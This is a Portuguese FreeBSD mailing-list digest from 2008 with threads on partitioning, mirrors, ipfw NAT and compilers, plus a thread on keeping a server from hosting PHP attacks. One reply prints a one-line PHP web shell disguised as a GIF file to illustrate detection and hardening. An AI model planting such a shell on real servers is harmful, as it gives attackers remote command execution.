[FUG-BR] video aula em FreeBSD
Olá amigos da lista, Gostaria de saber onde eu encontro video aulas para iniciante em cd ou DVD sobre FreeBSD. Já encontrei varias videos aulas inclusive de Linux, mas nao encontrei nada em FreeBSD. Obrigado, Carlos - Abra sua conta no Yahoo! Mail, o único sem limite de espaço para armazenamento! - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Tamanho das partições no bsd
João, Eu uso da seguinte maneira. No caso da memoria ram de 1 Gb swap 150% memoria ram ou 1,5 Gb / 200 % memoria ram ou 2 Gb /var 10x emoria ram ou 10 Gb / usr resto o disco, pois é la que ficam a mair parte dos dados e programas. Se voce for usar o mysql postgre, plone etc.. etc... os dados são aramazenados em /var/... então voce pode aumentar o /var ou criar links simbolicos para outras areas de disco. Gerson joao jamaicabsd escreveu: Muito obrigado pela ajuda galera, será de muito valia, mas gostaria de saber tipo assim: / = 10% /boot = 5% /etc = 10% /usr = 30% . . . . Tem como vc´s me dar um auxilio para entender isso? O que seria seria melhor neste caso? Obrigado novamente 2008/2/21 Marcelo Soares da Costa [EMAIL PROTECTED]: Eu gosto de colocar a aplicação web e o banco de dados em outra partição primaria , slice, assim reinstalo o sistema sem alterar os dados do banco e deixo os script php lá sussegados e ainda a partição pode ser montada com noexec, nosuid etc e tal []'s Em Qui, 2008-02-21 às 13:30 -0300, ThOLOko escreveu: Cara, depende mto do seu uso. Caso gere muitos graficos, banco de dados, aconcelho que deixe um bom tamanho no /var. Abraços! Em 21/02/08, joao jamaicabsd[EMAIL PROTECTED] escreveu: Boa tarde a todos! Uma dúvida que vem me acompanhando a algum tempo. Para eu montar um server como BSD qual o tamanho mais aconselhável das particões /, /usr, /etc, etc, para um servidor que terá apache, mysql, php, samba, ftp, squid e sarg. Irei fazer estes testes em um hd de 20GB. Alguém pode me dar uma força? Obrigado a todos -- E-mail: [EMAIL PROTECTED] Aux Suporte de Sistemas (UNISUL) E-mail: [EMAIL PROTECTED] MSN: [EMAIL PROTECTED] Cel: (48) 9144 2326 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd === Aviso de confidencialidade: === Esta mensagem da Empresa Brasileira de Pesquisa Agropecuaria (Embrapa), empresa publica federal regida pelo disposto na Lei Federal N. 5.851,de 7 de dezembro de 1972, e enviada exclusivamente a seu destinatario e pode conter informacoes confidenciais, protegidas por sigilo profissional. Sua utilizacao desautorizada e ilegal e sujeita o infrator as penas da lei. Se voce a recebeu indevidamente, queira, por gentileza, reenvia-la ao emitente, esclarecendo o equivoco. = Confidentiality note: = This message from Empresa Brasileira de Pesquisa Agropecuaria (Embrapa) a government company established under Brazilian law (5.851/72) is directed exclusively to its addresses and may contain confidential data, protected under professional secrecy rules. Its unauthorized use is illegal and may subject the transgressor to the law's penalties. If you are not the addressee, please send it back, elucidating the failure. == Embrapa Florestas www.cnpf.embrapa.br [EMAIL PROTECTED] [EMAIL PROTECTED] - - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] video aula em FreeBSD
2008/2/22, Carlos [EMAIL PROTECTED]: Olá amigos da lista, Gostaria de saber onde eu encontro video aulas para iniciante em cd ou DVD sobre FreeBSD. Já encontrei varias videos aulas inclusive de Linux, mas nao encontrei nada em FreeBSD. Obrigado, Carlos - Abra sua conta no Yahoo! Mail, o único sem limite de espaço para armazenamento! - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd vc pode encontra na www.gnx.com.br. -- Alessandro de Souza Rocha Administrador de Redes e Sistemas Freebsd-BR User #117 - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] para quem cuida dos mirrors brasileiros do FreeBSD...
Olá Ari, com relação a espaço em disco: Mirror FTP: ~90 GB Mirror CVSUP: ~4 GB Com relação ao consumo do link, no momento não tenho a estatistica somente dos mirrors do FreeBSD, dado que o servidor de FTP que hospeda esse mirror (ftp.unicamp.br) também hospeda várias outras coisas. Assim que eu tiver a estatistica somente de ftp3.br.freebsd.org e cvsup2.br.freebsd.org eu informo. []s Ricardo Bueno On Thu, Feb 21, 2008 at 04:31:21PM -0300, Ari Arantes wrote: Ricardo, Você monitora o consumo do link que esse mirror custa para você? E o espaço em disco? []s, Ari Em 20/02/08, Ricardo Bueno da Silva[EMAIL PROTECTED] escreveu: Marcelo Duarte wrote: Carlos Anderson Jardim escreveu: Que coisa, É por isso que eu uso o cvsup03.US.FreeBSD.org O que podemos fazer para ajudar??? Att. Carlos Anderson Jardim Bom dia a todos, Carlos, estamos falando de mirrors FTP (BR) e não CVSUP (BR). Manter um mirror FTP demanda espaço para armazenamento, o que faz muitos desistirem com o passar do tempo. Sou mantenedor do cvsup3.br.freebsd.org e posso garantir que o cvsup1, 2 e 3 do Brasil funcionam maravilhosamente bem. Algum tempo atrás pela falta de comprometimento dos mirros FTP (BR) eu disse nessa lista que iria montar um, porém ainda tenho falta de espaço nos meus servidores. Prestigie o BR .. usem o cvsup(x).br.freebsd.org Atenciosamente, Marcelo Duarte (FORFE) São Carlos - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd Olá pessoal, mantenho o cvsup2.br.freebsd.org e o ftp3.br.freebsd.org e confesso que levei um susto ao verificar a situação dos demais mirros brasileiros. Como o Marcelo disse, a demanda de espaço para manter um mirror do FTP acarreta em algumas desistências. Há um tempo, tivemos problemas de hardware (disco) em nosso servidor e ficamos algumas semanas com o mirror fora do ar. Nosso link anda meio carregado, mas fora do horário de expediente tá uma beleza. :-) Fica aqui o convite para que utilizem esses mirrors. No momento, estou pensando em propor um mirror do portsnap por aqui, mas ainda não tenho ideia de espaço necessário para mantê-lo nem de banda que ele exigirá. Mas isso deve ficar para depois de conseguirmos aumentar nosso link por aqui. []s Ricardo Bueno - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Ricardo Bueno da Silvae-mail: [EMAIL PROTECTED] - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] OT-Ataque PHP injection
Oi Patrick, Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Como que funcionam essas regras que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance ? ou somente as regras que posso usar no snort. Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, não importa se é uma multinacional, pagara como pequeno. No site da SourceFire tem todos os detalhes sobre preços. São só as regras a principio, mas pode comprar o sistema deles. Não conheço quem use no país o sistema deles. Mas não parece ser mais do que o Snort com um front-end muito amigável. No caso da Juniper tem direito automaticamente a versão convertida pra Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS (que é um add-on no firewall Juniper). No Brasil quem representa a venda das assinaturas Source Fire é a BRConnection. Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu: Cristina Fernandes Silva escreveu: Acho que não fui clara, Vou explicar, Quero evitar que alguem da minha rede use o meu ip (endereço ) para fazer ataques de php injection para outro endereço externo. Até mesmo os meus usuarios interno fazer algum ataque para servidores externos.. Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de satisfação vai depender da qualidade das regras de análise de instrusão que você utilizar. Isso quer dizer que dependendo do nível de seriedade da empresa será proveitoso assinar um serviço (comercial) que oferece regras testadas e atualizadas. Apesar da escolha natural ser Source Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela Juniper. São as mesmas utilizadas no Juniper série 5000, convertidas pro Snort. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- William Grzybowski -- Jabber: william88 at gmail dot com Curitiba/PR - Brazil - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] migrando - iptables para ipfw (DNAT)
em IPFW vc deverá fazer o Firewall e utilizar o NATD ( man natd ) para fazer o nat caso venha a utilizar o PF a regra que controla o nat no PF é o rdr ( http://www.openbsd.org/faq/pf/index.html ). 2008/2/21, Daemon BR [EMAIL PROTECTED]: Boa noite lista, Estou com algumas dúvidas referentes ao ipfw, sobre a ordem das regras e o nat. Um exemplo: iptables -A FORWARD -i eth0 -p tcp --dport 3389 -j ACCEPT iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 3389 -j DNAT --to 192.168.0.35 libero o WTS para uma máquina da lan, como ficaria está regra através do IPFW ? As regras FORWARD e PREROUTING deve ter maior prioridade (ínicio ou final do firewall) ? - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- -=-=-=-=-=-=-=-=-=- William David Armstrong .Of course it runs Bio Systems Security Networking |== MSN / GT [EMAIL PROTECTED] ' OpenBSD or FreeBSD -- - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Dúvida VOIP/H.323 no FreeBSD
Amigos, A nível de conhecimento, aqui na empresa utilizamos um firewall linux que faz redirecionamento de uma porta para um equipamento VOIP (Planet VIP 400), para isso é preciso que no linux esteja habilitado o suporte ao protocolo H.323 (módulos ip_nat_h323 e ip_conntrack_h323 do iptables). A dúvida é a seguinte: No FreeBSD qual recurso é preciso para oferecer este mesmo serviço, de redirecionamento/tratamento de trávego VOIP? Abraço. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] OT-Ataque PHP injection
Olá, até onde eu entendi, o interesse da Cristina é em não ser uma provedora de códigos maliciosos, no caso PHP. Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques a rede/host, e sim de que a rede ou host seja uma provedora de ataques... na realidade não conheço solução voltada para isso... existe o mod_security do apache que pode te ajudar a monitorar e filtrar suas aplicações. Penso em algum programa que cheque a integridade de arquivos no servidor, algo parecido com o file: [EMAIL PROTECTED]:~$ cat sh.gif ?php system($_GET['sh']); ? [EMAIL PROTECTED]:~$ file sh.gif sh.gif: PHP script text e depois, habilitar alguns filtros no mod_security buscando checar qualquer uso indevido do php... confesso que não conheço muito o mod_security, uma vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar um tempo para brincar com ele). Acredito que no mais é realizar auditorias... procurar nos logs do apache por qualquer comando... estilo uname, id, ls ... nada que o cat,grep,awk não resolva! Espero ter ajudado, boa sorte! Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu: Oi Patrick, Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Como que funcionam essas regras que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance ? ou somente as regras que posso usar no snort. Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, não importa se é uma multinacional, pagara como pequeno. No site da SourceFire tem todos os detalhes sobre preços. São só as regras a principio, mas pode comprar o sistema deles. Não conheço quem use no país o sistema deles. Mas não parece ser mais do que o Snort com um front-end muito amigável. No caso da Juniper tem direito automaticamente a versão convertida pra Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS (que é um add-on no firewall Juniper). No Brasil quem representa a venda das assinaturas Source Fire é a BRConnection. Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu: Cristina Fernandes Silva escreveu: Acho que não fui clara, Vou explicar, Quero evitar que alguem da minha rede use o meu ip (endereço ) para fazer ataques de php injection para outro endereço externo. Até mesmo os meus usuarios interno fazer algum ataque para servidores externos.. Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de satisfação vai depender da qualidade das regras de análise de instrusão que você utilizar. Isso quer dizer que dependendo do nível de seriedade da empresa será proveitoso assinar um serviço (comercial) que oferece regras testadas e atualizadas. Apesar da escolha natural ser Source Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela Juniper. São as mesmas utilizadas no Juniper série 5000, convertidas pro Snort. - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- William Grzybowski -- Jabber: william88 at gmail dot com Curitiba/PR - Brazil - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- Att, Marcelo M. Fleury Linux User: #369521 Blog - http://marcelomf.blogspot.com/ Não basta saber, é preciso também aplicar; não basta querer é preciso também agir By Goethe - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Compilador Intel ICC - Melhoria de performance/Estabilidade?
É uma pena. Poderiam portar logo o compilador para EM64T. Com Gentoo compilei vários programas com ele. Não tive como gerar benchmarks comparativos, pois gostaria de compilar o Kernel do Linux com ele, mas sem chance. Mas pelo visto, o kernel do FreeBSD compila! Em 21/02/08, Carlos A. M. dos Santos [EMAIL PROTECTED] escreveu: 2008/2/21 Eduardo Frazão [EMAIL PROTECTED]: Bom dia a todos! Adiquirimos um novo servidor para hospedar nosso banco de dados, e eu gostaria de saber se de acordo com a configuração dele, seria interessante utilizar ao invés do GCC, o ICC ( Intel C Compiler ) para compilar o Kernel e o PostgreSQL, no quesito performance/estabilidade. Nas notas do port do ICC, o mantenedor diz que hoje é possível compilar o kernel com este compilador. Com Linux Gentoo AMD64, eu já compilei PostgreSQL com o ICC. Gostaria de saber se alguem tem alguma experiência com este compilador no FreeBSD, e se ele pode compilar para 64bits também. Configuração do Servidor: Dell PowerEdge 2900 III - Dois Processadores Intel Xeon E5410 // 2.33Ghz // 12MB de Cache por CPU. Estava pensando em usar FreeBSD 7.0 AMD64 por seu novo Scheduller ULE. O port para FreeBSD usa o compilador que a Intel fornece para ser usado na plataforma IA-32. Segundo as informações contidas em http://www.intel.com/cd/software/products/asmo-na/eng/compilers/277618.htm essa versão do compilador só gera código para IA32. -- Carlos A. M. dos Santos - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] OT-Ataque PHP injection
no php.ini vc pode fazer : disable_functions = system,exec isso fara com que o php nao execute as funcoes system() e nem exec().. dando maior seguranca a ataques desse tipo.. outras variaveis interessantes para prover maior seguranca no php sao: safe_mode= On safe_mode_gid=Off expose_php=Off register_globals=Off (sem comentarios.. rsrs) dispaly_error=Off log_eroor=On error_log=php_erro.log Considerando que seu php nao emitira erros, vale ainda configurar o apache: trocar : AddType application/x-httpd-php .php Por: AddType application/x-httpd-php .jsp Ou AddType application/x-httpd-php .dhmtl Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso dificultara ao atacante qual a tecnologia que vc esta usando.. ele pensara que é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc deixar a variavel display_error=On, qdo der um erro.. o cara ja vai saber o que vc sta usando.. isso ajuda mas nao evita ataques contra programacao mal feita!! modsecurity do apache é muito bom... acho que todos deveriam ter... com bons filtros.. ajuda muuuito!! ate. Gustavo Polillo Correa. -- Original Message --- From: Marcelo M. Fleury [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Fri, 22 Feb 2008 09:59:32 -0300 Subject: Re: [FUG-BR] OT-Ataque PHP injection Olá, até onde eu entendi, o interesse da Cristina é em não ser uma provedora de códigos maliciosos, no caso PHP. Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques a rede/host, e sim de que a rede ou host seja uma provedora de ataques... na realidade não conheço solução voltada para isso... existe o mod_security do apache que pode te ajudar a monitorar e filtrar suas aplicações. Penso em algum programa que cheque a integridade de arquivos no servidor, algo parecido com o file: [EMAIL PROTECTED]:~$ cat sh.gif ?php system($_GET['sh']); ? [EMAIL PROTECTED]:~$ file sh.gif sh.gif: PHP script text e depois, habilitar alguns filtros no mod_security buscando checar qualquer uso indevido do php... confesso que não conheço muito o mod_security, uma vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar um tempo para brincar com ele). Acredito que no mais é realizar auditorias... procurar nos logs do apache por qualquer comando... estilo uname, id, ls ... nada que o cat,grep, awk não resolva! Espero ter ajudado, boa sorte! Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu: Oi Patrick, Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Como que funcionam essas regras que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance ? ou somente as regras que posso usar no snort. Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, não importa se é uma multinacional, pagara como pequeno. No site da SourceFire tem todos os detalhes sobre preços. São só as regras a principio, mas pode comprar o sistema deles. Não conheço quem use no país o sistema deles. Mas não parece ser mais do que o Snort com um front-end muito amigável. No caso da Juniper tem direito automaticamente a versão convertida pra Snort todos que tem Juniper série 5000 e já pague a licença anual do IPS (que é um add-on no firewall Juniper). No Brasil quem representa a venda das assinaturas Source Fire é a BRConnection. Em 21/02/08, Patrick Tracanelli[EMAIL PROTECTED] escreveu: Cristina Fernandes Silva escreveu: Acho que não fui clara, Vou explicar, Quero evitar que alguem da minha rede use o meu ip (endereço ) para fazer ataques de php injection para outro endereço externo. Até mesmo os meus usuarios interno fazer algum ataque para servidores externos.. Cristina, um IDS ou IPS (Snort) sem dúvidas, é suficiente. O nível de satisfação vai depender da qualidade das regras de análise de instrusão que você utilizar. Isso quer dizer que dependendo do nível de seriedade da empresa será proveitoso assinar um serviço (comercial) que oferece regras testadas e atualizadas. Apesar da escolha natural ser Source Fire, minha escolha pessoal (e sugestão) é pelas regras fornecidas pela Juniper. São as mesmas utilizadas
[FUG-BR] inicializando inadyn no freebsd
Bom dia Lista Estou com o inadyn e o no-ip instalado no freebsd. Quero falar q ele chame o aplicativo quando o ppp estiver up Tem algum script para isso ? - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] inicializando inadyn no freebsd
use o /etc/ppp/ip-up** 2008/2/22, Eddy Martins [EMAIL PROTECTED]: Bom dia Lista Estou com o inadyn e o no-ip instalado no freebsd. Quero falar q ele chame o aplicativo quando o ppp estiver up Tem algum script para isso ? - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd -- /* * Klaus Schneider */ - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] OT-Ataque PHP injection
opa Marcelo.. bem colocado sua sugestao de footprint .. é preciso mudar o banner do apache e do SO tbm... :) -- Original Message --- From: Marcelo M. Fleury [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Fri, 22 Feb 2008 11:10:56 -0300 Subject: Re: [FUG-BR] OT-Ataque PHP injection Bom, a pergunta é sobre sofrer ataques ou prover ataques ? Seria bom esclarecer isso, a maioria das respostas é como evitar os ataques, mas eu entendi que ela quer garantir que em seu servidor não tenha códigos maliciosos, capazes de prover ataques em OUTROS servidores e não no dela... Gustavo, acrescentaria na sua lista o magic_quotes_gpc de qualquer formar, acredito que todas devem ser analisadas, buscando mensurar o impacto nos sistemas existentes... com relação a alterar a extensão do php, não sei até que ponto isso é valido... teria que se alterar o banner do apache também, dentre outras coisas( eu acho )... ataques de footprint são cada vez mais sofisticados... []s Em 22/02/08, Gustavo Polillo Correa [EMAIL PROTECTED] escreveu: no php.ini vc pode fazer : disable_functions = system,exec isso fara com que o php nao execute as funcoes system() e nem exec().. dando maior seguranca a ataques desse tipo.. outras variaveis interessantes para prover maior seguranca no php sao: safe_mode= On safe_mode_gid=Off expose_php=Off register_globals=Off (sem comentarios.. rsrs) dispaly_error=Off log_eroor=On error_log=php_erro.log Considerando que seu php nao emitira erros, vale ainda configurar o apache: trocar : AddType application/x-httpd-php .php Por: AddType application/x-httpd-php .jsp Ou AddType application/x-httpd-php .dhmtl Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso dificultara ao atacante qual a tecnologia que vc esta usando.. ele pensara que é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc deixar a variavel display_error=On, qdo der um erro.. o cara ja vai saber o que vc sta usando.. isso ajuda mas nao evita ataques contra programacao mal feita!! modsecurity do apache é muito bom... acho que todos deveriam ter... com bons filtros.. ajuda muuuito!! ate. Gustavo Polillo Correa. -- Original Message --- From: Marcelo M. Fleury [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Fri, 22 Feb 2008 09:59:32 -0300 Subject: Re: [FUG-BR] OT-Ataque PHP injection Olá, até onde eu entendi, o interesse da Cristina é em não ser uma provedora de códigos maliciosos, no caso PHP. Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques a rede/host, e sim de que a rede ou host seja uma provedora de ataques... na realidade não conheço solução voltada para isso... existe o mod_security do apache que pode te ajudar a monitorar e filtrar suas aplicações. Penso em algum programa que cheque a integridade de arquivos no servidor, algo parecido com o file: [EMAIL PROTECTED]:~$ cat sh.gif ?php system($_GET['sh']); ? [EMAIL PROTECTED]:~$ file sh.gif sh.gif: PHP script text e depois, habilitar alguns filtros no mod_security buscando checar qualquer uso indevido do php... confesso que não conheço muito o mod_security, uma vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar um tempo para brincar com ele). Acredito que no mais é realizar auditorias... procurar nos logs do apache por qualquer comando... estilo uname, id, ls ... nada que o cat,grep, awk não resolva! Espero ter ajudado, boa sorte! Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu: Oi Patrick, Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Como que funcionam essas regras que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance ? ou somente as regras que posso usar no snort. Sim, são cobradas. Na Source Fire depende do seu perfil, tem varios precos. Eles confiam no que voce diz: Se voce diz que é pequeno porte, não importa se é uma multinacional, pagara como pequeno. No site da SourceFire tem todos os detalhes sobre preços. São só as regras a principio, mas pode comprar o sistema deles. Não
Re: [FUG-BR] OT-Ataque PHP injection
Olha pessoal é como evitar prover ataques originados do meu servidor. Em 22/02/08, Gustavo Polillo Correa[EMAIL PROTECTED] escreveu: opa Marcelo.. bem colocado sua sugestao de footprint .. é preciso mudar o banner do apache e do SO tbm... :) -- Original Message --- From: Marcelo M. Fleury [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Fri, 22 Feb 2008 11:10:56 -0300 Subject: Re: [FUG-BR] OT-Ataque PHP injection Bom, a pergunta é sobre sofrer ataques ou prover ataques ? Seria bom esclarecer isso, a maioria das respostas é como evitar os ataques, mas eu entendi que ela quer garantir que em seu servidor não tenha códigos maliciosos, capazes de prover ataques em OUTROS servidores e não no dela... Gustavo, acrescentaria na sua lista o magic_quotes_gpc de qualquer formar, acredito que todas devem ser analisadas, buscando mensurar o impacto nos sistemas existentes... com relação a alterar a extensão do php, não sei até que ponto isso é valido... teria que se alterar o banner do apache também, dentre outras coisas( eu acho )... ataques de footprint são cada vez mais sofisticados... []s Em 22/02/08, Gustavo Polillo Correa [EMAIL PROTECTED] escreveu: no php.ini vc pode fazer : disable_functions = system,exec isso fara com que o php nao execute as funcoes system() e nem exec().. dando maior seguranca a ataques desse tipo.. outras variaveis interessantes para prover maior seguranca no php sao: safe_mode= On safe_mode_gid=Off expose_php=Off register_globals=Off (sem comentarios.. rsrs) dispaly_error=Off log_eroor=On error_log=php_erro.log Considerando que seu php nao emitira erros, vale ainda configurar o apache: trocar : AddType application/x-httpd-php .php Por: AddType application/x-httpd-php .jsp Ou AddType application/x-httpd-php .dhmtl Ai vc renomeia todos os seus arquivos .php para jsp ou dhtml e isso dificultara ao atacante qual a tecnologia que vc esta usando.. ele pensara que é java pages ou dhtml ou asp.. enquanto que vc usa php!! Mas se vc deixar a variavel display_error=On, qdo der um erro.. o cara ja vai saber o que vc sta usando.. isso ajuda mas nao evita ataques contra programacao mal feita!! modsecurity do apache é muito bom... acho que todos deveriam ter... com bons filtros.. ajuda muuuito!! ate. Gustavo Polillo Correa. -- Original Message --- From: Marcelo M. Fleury [EMAIL PROTECTED] To: Lista Brasileira de Discussão sobre FreeBSD (FUG-BR) freebsd@fug.com.br Sent: Fri, 22 Feb 2008 09:59:32 -0300 Subject: Re: [FUG-BR] OT-Ataque PHP injection Olá, até onde eu entendi, o interesse da Cristina é em não ser uma provedora de códigos maliciosos, no caso PHP. Acredito que um IDS/IPS não adiantaria, uma vez que não se trata de ataques a rede/host, e sim de que a rede ou host seja uma provedora de ataques... na realidade não conheço solução voltada para isso... existe o mod_security do apache que pode te ajudar a monitorar e filtrar suas aplicações. Penso em algum programa que cheque a integridade de arquivos no servidor, algo parecido com o file: [EMAIL PROTECTED]:~$ cat sh.gif ?php system($_GET['sh']); ? [EMAIL PROTECTED]:~$ file sh.gif sh.gif: PHP script text e depois, habilitar alguns filtros no mod_security buscando checar qualquer uso indevido do php... confesso que não conheço muito o mod_security, uma vez que não trampo mais como sysadmin e sim como desenvolvedor(quero arrumar um tempo para brincar com ele). Acredito que no mais é realizar auditorias... procurar nos logs do apache por qualquer comando... estilo uname, id, ls ... nada que o cat,grep, awk não resolva! Espero ter ajudado, boa sorte! Em 22/02/08, William Grzybowski [EMAIL PROTECTED] escreveu: Oi Patrick, Não sei se entendi muito bem, poderia me dar uma luz? Php injection, como próprio nome ja diz é a inserção de codigo php causado por código mal escrito que permito o injeção de código php externo no servidor, correto? Como que funcionam essas regras que você falou? Essas empresas liberam regras que atuam (obviamente) na camada do HTTP e analizam o trafego para os softwares vulneraveis que eles tem conhecimento e inclusao direta de scripts em servidores externos? Vlw 2008/2/21 Patrick Tracanelli [EMAIL PROTECTED]: Cristina Fernandes Silva escreveu: É cobrada essas regras ? Vc tem alguma faixa de preço ? é apllicance
Re: [FUG-BR] OT-Ataque PHP injection
Bom, a pergunta é sobre sofrer ataques ou prover ataques ? Seria bom esclarecer isso, a maioria das respostas é como evitar os ataques, mas eu entendi que ela quer garantir que em seu servidor não tenha códigos maliciosos, capazes de prover ataques em OUTROS servidores e não no dela... Gustavo, acrescentaria na sua lista o magic_quotes_gpc de qualquer formar, acredito que todas devem ser analisadas, buscando mensurar o impacto nos sistemas existentes... com relação a alterar a extensão do php, não sei até que ponto isso é valido... teria que se alterar o banner do apache também, dentre outras coisas( eu acho )... ataques de footprint são cada vez mais sofisticados... []s Em 22/02/08, Gustavo Polillo Correa [EMAIL PROTECTED] escreveu: no php.ini vc pode fazer : disable_functions = system,exec isso fara com que o php nao execute as funcoes system() e nem exec().. dando maior seguranca a ataques desse tipo.. outras variaveis interessantes para prover maior seguranca no php sao: safe_mode= On safe_mode_gid=Off expose_php=Off register_globals=Off (sem comentarios.. rsrs) dispaly_error=Off log_eroor=On error_log=php_erro.log Considerando que seu php nao emitira erros, vale ainda configurar o apache: trocar : AddType application/x-httpd-php .php Por: AddType application/x-httpd-php 